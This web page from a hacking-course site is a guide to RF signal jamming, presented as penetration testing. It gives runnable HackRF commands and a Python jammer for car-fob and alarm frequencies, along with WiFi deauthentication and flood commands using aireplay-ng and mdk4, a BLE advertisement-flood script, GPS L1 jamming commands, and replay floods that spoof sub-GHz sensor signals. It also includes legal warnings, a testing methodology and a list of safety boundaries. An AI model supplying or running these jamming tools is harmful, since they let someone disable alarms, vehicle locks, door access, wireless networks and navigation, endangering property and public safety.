top of page

Jamming Signals/Frequencies (Guide)

Jamming Signals/Frequencies (Guide) | Black Hat HQ

Jamming Signals/Frequencies


Signal jamming for pentesting is about testing system resilience — what happens when wireless communication fails. This is a guide on jamming signals/frequencies.


The Hardware Toolchain


What You Already Have (Flipper Zero)


The Flipper's CC1101 Sub-GHz radio can transmit continuous wave at 300-348 MHz, 387-464 MHz, and 779-928 MHz (Unleashed firmware removes the TX lock). Its BLE module (nRF52832) can flood 2.4 GHz BLE channels. Neither is a dedicated jammer but both can disrupt specific targets at close range.


What Actually Works for Pentest Jamming


Device

Range

Frequency Coverage

Power

Best For

HackRF One

Medium

1 MHz - 6 GHz (full)

~15 dBm

Full-spectrum testing, protocol-aware jamming

LimeSDR

Medium

100 kHz - 3.8 GHz

~10 dBm

Precise, FPGA-accelerated

BladeRF

Medium

47 MHz - 6 GHz

~8 dBm

Wideband, good filtering

CC1101 + 20dBm amp

Long

300-928 MHz

~100 mW

Sub-GHz only, cheap, effective

nRF24L01 + PA/LNA

Medium

2.4 GHz

~20 dBm

WiFi/BLE jamming

ESP32

Short

2.4 GHz (WiFi/BLE)

~20 dBm

Deauth attacks, BLE flooding

YARD Stick One

Medium

Sub-GHz

~15 dBm

Dedicated Sub-GHz, good modulation


For most vehicle and access control pentests, HackRF is the right tool. Full frequency range, good power, massive community tooling.


Frequency Landscape - What You're Jamming


Different targets, different bands:


Target System

Frequency

Modulation

Jam Type

Car key fobs (US)

315 MHz

ASK/OOK

CW or pattern-specific

Car key fobs (EU)

433.92 MHz

ASK/OOK

CW or pattern-specific

Car PKE challenge

125 kHz

LF CW

Magnetic field (different hardware)

Alarm panel sensors

315/433/868 MHz

ASK/OOK, FSK

CW or replay flooding

Garage doors

315/390/433 MHz

ASK/OOK, rolling

Protocol-aware

WiFi 2.4 GHz

2.4-2.4835 GHz

OFDM/DSSS

Deauth, channel flood

WiFi 5 GHz

5.15-5.85 GHz

OFDM

Channel-specific flood

Bluetooth/BLE

2.4-2.4835 GHz

FHSS/GFSK

Channel map flooding

GPS L1

1575.42 MHz

BPSK

CW sweep (extremely low power only)

NFC / HF RFID

13.56 MHz

ASK, various

Magnetic field disruption

Cellular (test lab only)

700-2600 MHz

Various

Wideband noise (FARADAY CAGE REQUIRED)

LoRa / LoRaWAN

868/915 MHz

Chirp spread

Chirp-specific sweep


Critical boundary: Jamming cellular, GPS, aviation, emergency services, or public communications is illegal regardless of pentest authorization. GPS jamming within a shielded lab for product testing is the sole exception. For a building pentest, cellular and GPS are off the table unless you own the spectrum or are in a certified Faraday environment.


Technique 1: Continuous Wave (CW)

The Sledgehammer

The simplest jam. Transmit a pure carrier at the target frequency. Any receiver near you is deafened by the signal.


HackRF — CW Jammer


bash

# Simple continuous wave at 315 MHz
hackrf_transfer -f 315000000 -x 40 -a 1 -t /dev/zero

# Parameters:
# -f: frequency in Hz
# -x 40: TX gain (0-47, 40 is max safe, 47 may overheat)
# -a 1: enable amplifier
# -t /dev/zero: transmit zeros = CW tone

# Swept CW (harder to filter, hits wider targets)
hackrf_transfer -f 315000000 -x 40 -a 1 -s 2000000 -t sweep.iq
# Where sweep.iq is a pre-generated IQ file that sweeps ±100 kHz

Flipper Zero — CW via External CC1101


bash

# Flipper GPIO → external CC1101 with PA/LNA
# Use Unleashed firmware's CC1101 ext app
# Or write custom Sub-GHz RAW that's just carrier

# On Flipper: Sub-GHz → Read → Raw → record 1 second of silence
# Edit the .sub file to extend duration
# This effectively transmits dead carrier at whatever frequency you set

Python Automation for HackRF


python

#!/usr/bin/env python3
"""
Targeted jammer for authorized pentesting.
Jams specific frequency for defined duration.
"""
import subprocess
import time
import sys
import signal
import argparse

def jam(freq_mhz, duration_sec, gain=40):
    """Transmit CW at specified frequency for specified duration"""
    freq_hz = int(freq_mhz * 1_000_000)
    
    print(f"[+] Jamming {freq_mhz} MHz for {duration_sec} seconds...")
    
    proc = subprocess.Popen([
        "hackrf_transfer",
        "-f", str(freq_hz),
        "-x", str(gain),
        "-a", "1",          # Amp on
        "-t", "/dev/zero",  # CW
        "-s", "2000000",    # Sample rate
    ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    
    try:
        time.sleep(duration_sec)
    except KeyboardInterrupt:
        pass
    finally:
        proc.terminate()
        proc.wait()
        print("[+] Jammer stopped")

def jam_pulse(freq_mhz, on_time, off_time, cycles, gain=40):
    """Pulsed jamming — harder to locate, tests recovery behavior"""
    freq_hz = int(freq_mhz * 1_000_000)
    
    print(f"[+] Pulsed jamming {freq_mhz} MHz: "
          f"{on_time}s on / {off_time}s off × {cycles}")
    
    for i in range(cycles):
        print(f"  Pulse {i+1}/{cycles} — JAMMING")
        proc = subprocess.Popen([
            "hackrf_transfer",
            "-f", str(freq_hz),
            "-x", str(gain),
            "-a", "1",
            "-t", "/dev/zero",
            "-s", "2000000",
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
        time.sleep(on_time)
        proc.terminate()
        proc.wait()
        
        if i < cycles - 1:
            print(f"  Pulse {i+1}/{cycles} — quiet")
            time.sleep(off_time)
    
    print("[+] Pulse sequence complete")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Targeted pentest jammer")
    parser.add_argument("freq", type=float, help="Target frequency in MHz")
    parser.add_argument("-d", "--duration", type=int, default=10,
                       help="Duration in seconds")
    parser.add_argument("-p", "--pulse", action="store_true",
                       help="Pulsed mode")
    parser.add_argument("--on-time", type=float, default=2.0)
    parser.add_argument("--off-time", type=float, default=3.0)
    parser.add_argument("--cycles", type=int, default=5)
    parser.add_argument("-g", "--gain", type=int, default=40)
    
    args = parser.parse_args()
    
    signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
    
    if args.pulse:
        jam_pulse(args.freq, args.on_time, args.off_time, 
                  args.cycles, args.gain)
    else:
        jam(args.freq, args.duration, args.gain)

Technique 2: Protocol-Aware Jamming - The Scalpel


CW is loud and obvious. Protocol-aware jamming injects garbage into the actual protocol, disrupting communication while looking like noise to spectrum analyzers.


Sub-GHz — Car Fob / Alarm Sensor Jamming


bash

# Capture the target's actual signal first (with Flipper or HackRF)
hackrf_transfer -f 315000000 -r target_signal.iq -s 2000000 -n 20000000

# Analyze in Universal Radio Hacker (URH) or inspectcli
# Determine: modulation (ASK/OOK/FSK), bit rate, preamble, sync word

# Generate jamming signal that mimics the protocol
# — Repeating preamble (prevents sync)
# — Random payload (corrupts valid data after sync)
# — Valid structure with invalid data (fools some filters)

# URH can generate these from the captured signal
# Export as IQ file, replay with HackRF:

hackrf_transfer -f 315000000 -t protocol_jam.iq -x 40 -a 1 -R
# -R: repeat the IQ file continuously

WiFi Deauthentication (Targeted)


This is protocol-level jamming. Not a raw RF blast — you're sending valid 802.11 management frames.


bash

# Aireplay-ng — deauth specific client
sudo aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 0: infinite deauth packets

# MDK4 — the dedicated WiFi jammer
sudo mdk4 wlan0mon d -c 1,6,11    # Deauth on channels 1, 6, 11
sudo mdk4 wlan0mon b -c 1 -t AP_MAC  # Beacon flood on channel 1
sudo mdk4 wlan0mon a -a AP_MAC       # Auth flood (DoS AP)
sudo mdk4 wlan0mon p -b 00:11:22:33:44:55  # Probe flood

# ESP32 deauther (dedicated, portable)
# Flash Spacehuhn's ESP8266/ESP32 Deauther firmware
# Battery-powered, fits in pocket
# Web interface to select targets

BLE — Advertisement Flooding


python

#!/usr/bin/env python3
"""BLE advertisement flood — tests BLE resilience"""
from scapy.all import *
from bluetooth import *

def ble_adv_flood(iface="hci0", count=1000):
    """Flood BLE advertising channels with random advertisements"""
    print(f"[+] BLE flood starting on {iface}")
    
    for i in range(count):
        # Random MAC, random data
        pkt = BTLE() / BTLE_ADV(RxAdd=0, TxAdd=0) / \
              BTLE_ADV_IND(AdvA=RandMAC(), AdvData=b"\x00" * 31)
        sendp(pkt, iface=iface, verbose=0)
        if i % 100 == 0:
            print(f"  Sent {i} advertisements")
    
    print(f"[+] Flood complete: {count} advertisements sent")

# For Flipper Zero: Apps → Bluetooth → BLE Spam
# Select target type (iOS, Android, Windows, Tesla)
# Floods BLE advertisements continuously

Technique 3: GPS Jamming (Shielded Lab Only)


GPS L1 (1575.42 MHz) is extremely weak at the receiver (~-130 dBm). Even microwatt-level jamming can overwhelm it.


This is ILLEGAL outside a certified Faraday cage. Within a shielded lab testing vehicle telematics or asset trackers:


bash

# Extremely low power GPS test signal
# ONLY in Faraday-caged environment

# Generate a swept tone across GPS L1 bandwidth (2 MHz wide)
# Using GNU Radio or custom IQ generation
python3 generate_gps_noise.py  # Your IQ file generator

# Transmit at MINIMUM power
hackrf_transfer -f 1575420000 -t gps_noise.iq -x 0 -a 0 -s 2000000

# -x 0: MINIMUM gain
# -a 0: amplifier OFF
# Start with lowest power, increase only if needed
# Verify with spectrum analyzer that signal stays in cage

# The pentest question: "Does the GPS tracker detect loss of signal
# and alert? Or does it silently fail?"

Technique 4: NFC / HF RFID Field Disruption


NFC and 13.56 MHz RFID use magnetic near-field coupling. Jamming requires disrupting the reader's magnetic field.


bash

# This is HARD to do at distance — near-field drops as 1/r³
# Practical only within ~10cm of the reader

# Flipper Zero approach:
# 13.56 MHz → Extra Actions → Emulate Reader
# Flipper continuously polls for cards
# This creates a competing 13.56 MHz field
# Hold Flipper against the target reader
# The reader's field and Flipper's field interfere
# Tags can't communicate with either

# Dedicated approach: Proxmark3
pm3 → hf 14a reader
# Continuous polling disrupts nearby ISO 14443 readers

# This tests: does the door fail open or fail closed?
# Does security detect the reader being disrupted?

Technique 5: Sub-GHz Spoof-Jamming Hybrid


The most effective Sub-GHz attack isn't pure jamming — it's flooding with valid-looking but wrong data.


bash

# 1. Capture the target's sensor/key fob signal
hackrf_transfer -f 433920000 -r capture.iq -s 2000000 -n 10000000

# 2. Extract the protocol in URH
# Identify: preamble, sync word, payload structure, CRC

# 3. Generate hundreds of variants:
# - Valid preamble + random payload
# - Valid preamble + valid structure + random values
# - Valid structure + invalid CRC (consumes receiver processing time)

# 4. Replay at high speed
hackrf_transfer -f 433920000 -t spoof_flood.iq -x 40 -a 1 -R

# The receiver spends all its time trying to decode garbage.
# Legitimate signals are lost in the noise.

Pentest Methodology - What You're Actually Testing


Jamming isn't a standalone attack. You're testing resilience:


1. Fail-Safe vs Fail-Secure


[Alarm sensor jammed] → Does it alert "sensor offline" or stay silent?
[Door controller jammed] → Does it lock, unlock, or maintain state?
[GPS jammed]            → Does tracker alert, or report last known position silently?
[WiFi deauthed]         → Does the security system fall back to wired? Cellular?

2. Detection Testing


[Start jamming] → How long until SOC/SIEM detects signal loss?
[Stop jamming]  → Does the system auto-recover? How long?
[Pulse jamming] → Does intermittent disruption trigger alerts or get averaged out?

3. Fallback Testing


[WiFi down]     → Does the alarm panel fall back to cellular? Ethernet?
[Sub-GHz down]  → Do sensors have alternate paths? Wired zones?
[BLE down]      → Does the phone key fall back to NFC? Keypad?
[GPS down]      → Does navigation fall back to dead reckoning? INS?

Engagement Workflow


bash

# ===== PRE-ENGAGEMENT =====
# 1. Document: every frequency you'll transmit on
# 2. Document: max power level, duration, location
# 3. Confirm: Faraday cage for any GPS/cellular testing
# 4. Confirm: no adjacent medical/life-safety wireless systems
# 5. Have: spectrum analyzer ready to verify emissions stay in scope

# ===== TESTING =====
# 6. Start with minimum power, increase only as needed
# 7. Jam for minimum duration to observe effect
# 8. Allow full recovery between tests
# 9. Monitor with spectrum analyzer throughout

# ===== DOCUMENTATION =====
# 10. For each test: frequency, power, duration, observed effect
# 11. Time from jam start to detection (by blue team)
# 12. Time from jam stop to full recovery
# 13. CVSS for each finding

The Safety Boundaries


These are hard lines. Crossing them is illegal regardless of pentest authorization:


Don't

Why

Jam cellular bands (700-2600 MHz in US)

Blocks 911 calls. Federal crime. FCC hunts aggressively.

Jam GPS outside a Faraday cage

Aircraft, maritime, emergency services. Severe federal crime.

Jam aviation bands (108-137 MHz)

Air traffic control. Life safety.

Jam marine VHF (156-162 MHz)

Distress channels. Coast Guard responds.

Jam emergency services

Police/fire/ambulance radio. Obvious.

Jam in hospitals

Medical telemetry, pacemaker programmers.

Jam outside your authorized scope

The authorization letter defines the building/floor/time window. Stay in it.

Use power amplification without measurement

Know your ERP. A HackRF + 20W amp at 315 MHz will blanket a neighborhood. Don't.

Leave the jammer unattended

You must be physically present and able to stop immediately if something goes wrong.


Practical: HackRF Jamming Kit Build


bash

# Minimum viable pentest jamming kit:
# 1. HackRF One
# 2. Portable power (USB-C battery pack, 20000 mAh)
# 3. Laptop running Kali
# 4. Small spectrum analyzer (TinySA, ~$60 — verifies your emissions)
# 5. Appropriate antennas:
#    - 315/433 MHz telescopic for Sub-GHz
#    - 2.4/5 GHz for WiFi/BLE
#    - GPS patch antenna (shielded lab only)

# Verify emissions before testing:
# 1. Set up HackRF at test frequency
# 2. Walk perimeter with TinySA in max-hold mode
# 3. Confirm signal is contained to authorized test area
# 4. Document the emission envelope

Enroll In Online Cybersecurity & Hacking Classes/Courses | Black Hat HQ

Comments


Master the Art!

Info

715-527-1928

www.blackhathq.com

Address

P.O. Box 126
Antigo, Wisconsin 54409

The skills/techniques/guides on this site are not for illegal/illicit use and are not condoned by
Black Hat HQ!

Best Value

Elite Hacker

$100

100

Every month

Get Access To All The Courses For A Monthly Fee

Valid until canceled

Get complete access to all courses with Elite Hacker!

Get full access to exclusive online Groups/Forums!

Best Value

Neophyte

$50

50

Every month

Get Access To All Courses $10 Or Less!

Valid until canceled

Get access to all courses $10 or under!

Get exclusive access to specific forums/groups!

Choose your pricing plan

Find one that works for you

© 2026 Black Hat HQ

bottom of page